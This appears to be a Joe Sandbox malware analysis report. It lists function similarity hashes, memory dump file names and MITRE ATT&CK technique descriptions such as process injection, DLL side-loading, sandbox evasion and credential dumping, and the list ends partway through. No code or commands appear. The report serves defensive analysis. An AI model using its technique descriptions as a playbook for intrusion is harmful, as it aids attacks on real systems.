Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5428c583bb4ae9dd8e9c08f14be5e957725045bf295748e109d5b687818e21
Instruction ID: f8aa79f3d9e265df69aef41ff48861a70fa496ad2a1460acafb36b50e8d7c0e4
Opcode Fuzzy Hash: 3a5428c583bb4ae9dd8e9c08f14be5e957725045bf295748e109d5b687818e21
Instruction Fuzzy Hash: 02219EB3A0C704AFD301BE69EC856AEFBE5FF98220F06493DD7D483610E67155048A97

Function 0016753A Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b32ca28c23b2cad1d69c4fc66bb0fa316b8304a2137ffcfe6eee8d130bc40f
Instruction ID: 048cda4775621951ceeff27d8a8164dbf0236ef0de56f3969bd3e5728a0d6f85
Opcode Fuzzy Hash: 08b32ca28c23b2cad1d69c4fc66bb0fa316b8304a2137ffcfe6eee8d130bc40f
Instruction Fuzzy Hash: CF218EB3F2052107F3548839CE693A225839BD5714F2F82798F9CABAC9DC7C4D0A1284

Function 00123276 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29bd83c5120fd46a073a758cb3bb1458a96a179cfe6dfae8a14a0a2bb1251024
Instruction ID: 1ce6d4c36e61c218e7ed711102d30c920d9979f6d2e2c4af7d5ce2297aa6c0bb
Opcode Fuzzy Hash: 29bd83c5120fd46a073a758cb3bb1458a96a179cfe6dfae8a14a0a2bb1251024
Instruction Fuzzy Hash: 382129F3F1162547F39844A5CC69362618397D1321F3F827A8E29AB7C5EC7D8D0612C4

Function 0015943F Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e23a62483a2ebae5730752556e9685f9e7a2c28589ab9e89941093b7fb9fe28
Instruction ID: 10e4dd118116d42ef0e4d3227b072e501e1715dbbce8092258fb7148c1f409af
Opcode Fuzzy Hash: 1e23a62483a2ebae5730752556e9685f9e7a2c28589ab9e89941093b7fb9fe28
Instruction Fuzzy Hash: 9621E9E3F216250BF7908879CD583566543A795314F2F82788E8CBBBC9D87E9E0A17C4

Function 0014B671 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad6c123f12c7a9fd6014dee8bfae6b5951d9cff29b58ecaeefff9e2f4dee108b
Instruction ID: 8a95085afc066a06fba47eea3b821bdb29369da22dbd647dda225039a03fa779
Opcode Fuzzy Hash: ad6c123f12c7a9fd6014dee8bfae6b5951d9cff29b58ecaeefff9e2f4dee108b
Instruction Fuzzy Hash: 41214CB3F6113647F3644968CD6937261839BD1320F3F42798A4CAB7C4E97E9D4A62C8

Function 0014E643 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff830becdc1f9aa4a178dfd755a46848537f5076453dae389e69d325425b3fe
Instruction ID: 73f33eab8878e69098b2e3e98ea74bdeb2dd6946a2dfaf42447dca5a6d858b98
Opcode Fuzzy Hash: 1ff830becdc1f9aa4a178dfd755a46848537f5076453dae389e69d325425b3fe
Instruction Fuzzy Hash: 22218CB3F112154BF3944839DD693622583D7C4324F3F82398B59ABBC9DC7E9A0A5388

Function 000E45F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 4402517ef751ec7343fbd421d288e360cd2bab007a9875c4d412d2ca9240b792
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 3B11C833A051E40EC7168D3D8404569BFE31BE3639F5D8399F4B8AB2D6D6238D8A8356

Function 000DA060 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
Instruction ID: 9e8126867fb851662aa032bdd541cc49ea6d26b825f02f801ffdfd347e151c91
Opcode Fuzzy Hash: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
Instruction Fuzzy Hash: 1501BCF570070147DB60AE6094D0B6BBAE8AF82704F18852DE80847302DB76EC08C7B2

Function 000DB3DE Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc9f720fa32b8cc13845ad22a3cc3087f4270c6bb68610754db6509cade8e81
Instruction ID: 9815cb4033c1a479d434689b4a4c06561a32b973acd35b681ccd2ceb45dd2a3a
Opcode Fuzzy Hash: 6dc9f720fa32b8cc13845ad22a3cc3087f4270c6bb68610754db6509cade8e81
Instruction Fuzzy Hash: C6F090259887C386D319CA3E8070331FBE18F7B255F2D5569C4D257782D72A9909A624

Function 0010E1CA Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8b19f4c7dea8350c0ac87061785e956dfedb8cd2cb7f968fad3677c4c7e7c25
Instruction ID: cfc860f90cb9c6a2ce89dbcb92660f0dccb2903b77c08b5149b35ecd68cbc806
Opcode Fuzzy Hash: e8b19f4c7dea8350c0ac87061785e956dfedb8cd2cb7f968fad3677c4c7e7c25
Instruction Fuzzy Hash: 6801137191820ECFEB2A9F14C04A7EE77E0FB18301F650429D99185980D3BA0CE4CF1A

Function 000DB475 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4224173e5d95d7f859044d14442a6b45f5ab2cc9c6058f5d78314928d46b3859
Instruction ID: 79c36796069773bb7167ba0925aa7c94c838fc152a1786adb41df7d1feabb8eb
Opcode Fuzzy Hash: 4224173e5d95d7f859044d14442a6b45f5ab2cc9c6058f5d78314928d46b3859
Instruction Fuzzy Hash: D7D022749448405BC248EF10ED225B9B2698F4B2DBB042038E503FB313CE3CF860C60A

Function 000BC274 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195ad3edf0b53d44d156e36fa03d7402197cbb46c0d50378ecbe42e724765897
Instruction ID: 58af202774cb31862f35ff10d48fa0e3d9b51692968851211c7144e26e1b2cd4
Opcode Fuzzy Hash: 195ad3edf0b53d44d156e36fa03d7402197cbb46c0d50378ecbe42e724765897
Instruction Fuzzy Hash: 78D0122098E3994AD3069F389CA1731B7B1EB03100F042548C142DB691C7D49016D658

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
